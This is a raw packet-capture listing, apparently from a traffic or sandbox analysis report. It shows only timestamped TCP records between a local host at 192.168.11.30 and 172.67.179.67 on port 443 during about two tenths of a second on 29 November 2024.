                                                                                                            Nov 29, 2024 09:10:31.509221077 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.509849072 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.509865046 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.509995937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510046005 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510046005 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510096073 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510101080 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.510140896 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510140896 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.510955095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.510973930 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.511130095 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.511137962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.511178970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.511178970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.511199951 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.511295080 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.512228012 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.512244940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.512368917 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.512453079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.512458086 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.512521982 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.513483047 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.513501883 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.513647079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.513654947 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.513683081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.513683081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.513783932 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514553070 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.514569998 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.514714003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514755011 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514755011 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514801979 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514801979 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.514807940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.514858961 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.515404940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.515424967 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.515577078 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.515582085 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.515625954 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.515625954 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.515729904 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.684892893 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.684971094 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.685110092 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685302973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685348034 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.685484886 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.685554981 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685571909 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.685599089 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.685687065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685687065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685687065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685744047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685744047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.685816050 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.686285973 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.686348915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.686491013 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.686491013 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.686530113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.686551094 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.686630964 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.686687946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.687417984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.687485933 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.687630892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.687630892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.687683105 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.687700033 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.687700033 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.687882900 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688383102 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.688453913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.688600063 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688601017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688601017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688601017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688654900 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.688772917 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.688903093 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.689357996 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.689438105 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.690089941 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690089941 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690090895 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690090895 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690145969 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.690165043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690380096 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690443993 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.690509081 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.690685034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690685034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690685034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.690732002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.690956116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691593885 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.691663027 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.691778898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691780090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691834927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691834927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691834927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.691860914 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.692032099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692540884 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.692610979 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.692739964 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692740917 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692792892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692792892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692794085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.692820072 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.693064928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.693494081 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.693557024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.693715096 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.693715096 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.693764925 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.693782091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.693782091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.693938017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.694598913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.694669962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.694813967 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.694813967 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.694875956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.694875956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.694905043 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.694947958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.695092916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.695772886 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.695844889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.695972919 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.695972919 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696036100 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696036100 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696036100 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696067095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.696252108 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696772099 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.696844101 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.696959972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.696959972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.697027922 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.697057009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.697083950 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.697236061 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.697758913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.697827101 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.697943926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.697943926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698009014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698009014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698009014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698040962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.698297024 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698710918 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.698784113 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.698901892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698901892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698901892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.698965073 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.698998928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.699150085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700177908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.700258017 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.700373888 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700375080 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700433016 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.700465918 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700551987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700608015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.700930119 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.700999975 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.701172113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.701172113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.701172113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.701229095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.701384068 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.701973915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.702042103 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.702173948 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702174902 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702222109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702222109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702222109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702251911 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.702450991 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.702914000 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.702984095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.703121901 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703121901 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703121901 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703121901 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703186035 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.703222036 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703391075 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.703937054 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.704009056 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.704127073 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704127073 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704189062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704189062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704189062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704220057 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.704407930 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.704912901 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.704982042 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.705126047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.705126047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.705188036 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.705188036 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.705215931 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.705245972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.705368042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706231117 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.706310987 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.706425905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706425905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706425905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706490040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.706509113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706509113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706700087 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.706975937 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.707046032 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.707176924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.707178116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.707178116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.707178116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.707242012 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.707262993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.707422972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.708116055 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.708184958 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.708324909 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.708326101 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.708326101 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.708388090 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.708405972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.708575010 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709498882 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.709579945 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.709712029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709712029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709712029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709712029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709778070 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.709800959 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.709989071 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.710355997 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.710428953 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.710597992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.710598946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.710650921 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.710674047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.710845947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.711333036 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.711404085 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.711563110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.711563110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.711563110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.711622953 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.711643934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.711817026 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712428093 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.712502956 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.712629080 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712629080 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712677956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712677956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712677956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.712707043 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.712898016 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713144064 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.713216066 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.713327885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713327885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713375092 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713376045 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713403940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.713438988 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.713594913 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.714334011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.714406013 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.714521885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.714521885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.714658976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.714709997 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.714893103 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.715517044 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.715588093 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.715730906 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.715730906 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.715873957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.715924978 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.716144085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.716562986 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.716634035 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.716756105 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.716756105 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.716816902 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.716844082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.716882944 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.717022896 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.717792034 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.717860937 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.718008041 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718008041 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718055010 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718081951 CET44349761172.67.179.67192.168.11.30
